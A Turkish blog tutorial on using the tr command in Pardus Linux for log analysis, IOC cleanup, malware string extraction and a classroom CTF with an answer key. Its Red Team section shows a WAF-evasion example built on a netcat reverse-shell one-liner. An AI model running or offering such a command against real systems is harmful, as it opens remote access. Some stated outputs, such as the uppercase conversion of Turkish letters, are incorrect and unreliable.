Pardus Linux’ta tr Komutu


Linux sistemlerinde metin işleme, siber güvenlik analizlerinin temel taşlarından biridir. Log analizi, veri temizleme, IOC (Indicator of Compromise) inceleme ve zararlı veri dönüşümlerinde sıkça kullanılan araçlardan biri de tr komutudur.

Pardus Linux gibi Debian tabanlı sistemlerde tr, metin içindeki karakterleri dönüştürmek, silmek veya sıkıştırmak için kullanılır.


⚙️ tr Komutu Nedir?

tr (translate), standart girdiden aldığı veriyi karakter bazında işler ve çıktıya dönüştürür.

📌 Önemli nokta:

  • Dosya üzerinde doğrudan çalışmaz

  • Pipe (|) ile kullanılır

  • Karakter seviyesinde çalışır (kelime veya satır değil)


🧪 Temel Kullanım Yapısı

tr [seçenek] SET1 [SET2]

🔤 1. Karakter Dönüştürme (Translate)

Küçük harfi büyük harfe çevirme

echo "siber güvenlik" | tr 'a-z' 'A-Z'

🔎 Çıktı:

SİBER GÜVENLİK

📌 Siber güvenlikte kullanım:

  • Log normalize etme

  • Case-sensitive analizleri standardize etme


🧹 2. Karakter Silme (Delete Mode)

Sayıları loglardan temizleme

echo "user123 logged in at 10:45" | tr -d '0-9'

🔎 Çıktı:

user logged in at :

📌 Siber güvenlik kullanımı:

  • IP adreslerinden sayıları temizleyerek pattern analizi

  • IOC temizleme

  • Gürültü azaltma


🧩 3. Tekrarlayan Karakterleri Sıkıştırma

Fazla boşlukları temizleme

echo "log    file    analysis" | tr -s ' '

🔎 Çıktı:

log file analysis

📌 Siber güvenlik kullanımı:

  • Normalize edilmiş log parsing

  • SIEM sistemlerine veri hazırlama


🔐 4. Güvenlik Odaklı Örnek: Log Analizi

Apache/Nginx log temizleme

cat access.log | tr -d '"' | tr -s ' '

📌 Amaç:

  • Gereksiz karakterleri temizlemek

  • Log formatını analiz edilebilir hale getirmek


🧠 5. IOC Analizi ile Kullanım

Bir zararlı IP listesini sadeleştirme:

cat ioc.txt | tr -d ' ' | tr ',' '\n'

📌 Kullanım:

  • IOC normalize etme

  • Threat intelligence veri hazırlama


🛡️ 6. Siber Güvenlikte tr Komutunun Rolü

🔍 1. Log Analizi

  • Web server loglarını temizleme

  • SIEM araçlarına veri hazırlama

🧪 2. Malware Analizi

  • Obfuscation çözme (basit encoding temizleme)

  • String normalizasyonu

🧹 3. Veri Temizleme

  • IOC listelerini standardize etme

  • Gürültü azaltma

🧬 4. Forensics (Adli Bilişim)

  • Delil loglarının düzenlenmesi

  • Zaman damgalarının ayrıştırılması


⚠️ Sınırlamalar

tr güçlü ama basittir:

  • Regex desteklemez ❌

  • Kelime bazlı işlem yapmaz ❌

  • Dosya düzenleme yapmaz ❌

📌 Daha gelişmiş işlemler için:

  • awk

  • sed

  • grep

kullanılır.


🔥 Gerçek Siber Güvenlik Senaryosu

Şüpheli log temizleme

cat auth.log | tr -s ' ' | tr -d ':' | tr 'A-Z' 'a-z'

📌 Amaç:

  • Logları normalize etmek

  • Saldırı tespiti için veri hazırlamak


📌 Sonuç

Pardus Linux üzerinde tr komutu, basit görünmesine rağmen siber güvenlikte:

  • Veri temizleme

  • Log analizi

  • IOC düzenleme

  • Threat intelligence hazırlığı

gibi kritik alanlarda aktif olarak kullanılır.


🧭 Öneri (Siber Güvenlik Öğrenme Yolu)

Eğer bu konuyu ilerletmek istiyorsan sırayla şunları öğrenmelisin:

  1. tr (karakter işlemleri)

  2. grep (arama ve filtreleme)

  3. sed (akış düzenleme)

  4. awk (ileri log analizi)

  5. ELK Stack / SIEM sistemleri



Siber güvenlik operasyonlarında hız, genellikle hayatta kalmak anlamına gelir. Bir olaya müdahale ederken (Blue Team) veya bir sistemdeki güvenlik duvarlarını atlatmaya çalışırken (Red Team), devasa veri yığınlarını saniyeler içinde işlemek zorundasınız. Bu makalede, Pardus Linux terminalinde tr komutunun operasyonel sahadaki kullanım senaryolarını inceleyeceğiz.

1. Blue Team (Mavi Takım) Operasyonları: İz Sürme ve Analiz

Savunma takımlarının en büyük kabusu, saldırganlar tarafından kasıtlı olarak bozulmuş (obfuscated) veya anlamsız karakterlerle (NULL byte'lar vb.) doldurulmuş log dosyaları ve zararlı ikili (binary) dosyalardır. tr komutu, bu gürültüyü filtrelemek için mükemmel bir araçtır.

Görev 1.1: Zararlı Yazılım İçerisindeki Okunabilir Metinleri Çıkarma (Strings Analysis)

Bir saldırı sonrası şüpheli bir ELF (çalıştırılabilir Linux dosyası) ele geçirdiniz. Dosyanın içindeki komutları, IP adreslerini veya URL'leri görmek istiyorsunuz, ancak cat komutu terminali bozan anlamsız karakterler basıyor.

Sadece ASCII standartlarında okunabilir (printable) karakterleri filtrelemek için:

Bash:
cat supheli_zararli.elf | tr -cd '[:print:]\n' > okunabilir_dizgiler.txt

Bu komutta -c (complement) ve -d (delete) parametreleri birleşerek "Okunabilir karakterler ([:print:]) ve alt satır (\n) HARİCİNDEKİ her şeyi sil" talimatını verir. Blue Team, oluşan yeni dosya üzerinden grep ile şüpheli IP'leri arayabilir.

Görev 1.2: Parçalanmış Log Kayıtlarını Birleştirme

Saldırgan, komut geçmişini veya sistem loglarını alt alta boş satırlarla bölerek analizi zorlaştırmış olabilir. Tekrarlayan boşlukları veya satır sonlarını tekilleştirmek için -s (squeeze) kullanılır:

Bash
cat bozulmus_auth.log | tr -s '\n' > temiz_auth.log

2. Red Team (Kırmızı Takım) Operasyonları: Gizlenme ve Taarruz

Saldırı simülasyonlarında, oluşturulan payload'ların hedef sistemin kısıtlamalarına uyması gerekir. Hedef sistemdeki bir web uygulaması veya terminal, sadece belirli formatta veri kabul ediyor olabilir.

Görev 2.1: Dinamik Parola / Dizi (String) Üretimi

Büyük Final etkinliğindeki parolaları veya "Flag"leri (bayrakları) sistemde otomatik olarak oluşturmanız gerektiğinde, Linux'un rastgele veri üreteci olan /dev/urandom dosyasını tr ile filtreleyebilirsiniz:

Bash:
# Sadece harf ve rakamlardan oluşan 16 karakterli rastgele bir parola/bayrak üretme
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1

Bu komut, urandom'dan gelen anlamsız veriyi sadece alfanümerik karakterler kalacak şekilde kırpar (tr -dc), fold ile 16 karakterde bir satırı böler ve head ile ilk satırı alır.

Görev 2.2: WAF (Web Application Firewall) Atlatma Taktikleri

Bazı basit güvenlik duvarları, yalnızca "SELECT", "UNION", "bash" gibi belirli kelimeleri küçük harflerle arar. Red Team, komut enjeksiyonu yaparken bu filtreleri atlatmak için karakter setlerini anında dönüştürebilir:

Bash:
# Payload'daki küçük harfleri büyük harfe çevirerek imza tabanlı (signature-based) WAF atlatma
echo "nc -e /bin/bash 192.168.1.50 4444" | tr '[:lower:]' '[:upper:]'

Çıktı: NC -E /BIN/BASH 192.168.1.50 4444 (Not: Çoğu Linux komutu büyük harfle çalışmaz, ancak Windows sistemlere veya case-insensitive çalışan SQL veritabanlarına yönelik enjeksiyonlarda bu teknik çok etkilidir.)


3. Büyük Final İçin Sınıf İçi Mini-CTF Senaryosu

Öğrencilerinizin öğrendiklerini pekiştirmesi için şu uygulamayı laboratuvarda gerçekleştirebilirsiniz:

Senaryo Başlangıcı: Kırmızı Takım, sistemde gizli_mesaj.txt adında bir dosya bıraktı. Ancak mesaj şu şekilde kriptolanmış ve arasına gereksiz semboller eklenmiştir:

#$V^#y$v@1^#6@*t$1#r%u_#f*1#o!3#e_%t@h@i#e!a#y@1*x#

Mavi Takımın Görevi (Çözüm Adımları):

  1. Önce tr -d ile sembolleri temizle (#, $, @, ^, *, %, !, _).

  2. Kalan metne ROT13 deşifresi uygula.

(Cevap anahtarı için öğrencilerden beklenen terminal komutu zinciri:)

Bash:
echo "#\$V^#y\$v@1^#6@*t\$1#r%u_#f*1#o!3#e_%t@h@i#e!a#y@1*x#" | tr -d '#$@^*%!_' | tr 'A-Za-z' 'N-ZA-Mn-za-m'


Yorumlar

Bu blogdaki popüler yayınlar

Android Telefon/Tablet Ekranını Pardus ETAP 23 Yüklü Akıllı Tahtaya Yansıtma

Pardus Etap 23’de Unutulmuş Etap Yetkili Parolasını Sıfırlama

Pardus Etap 23 Yazıcı Kurulumu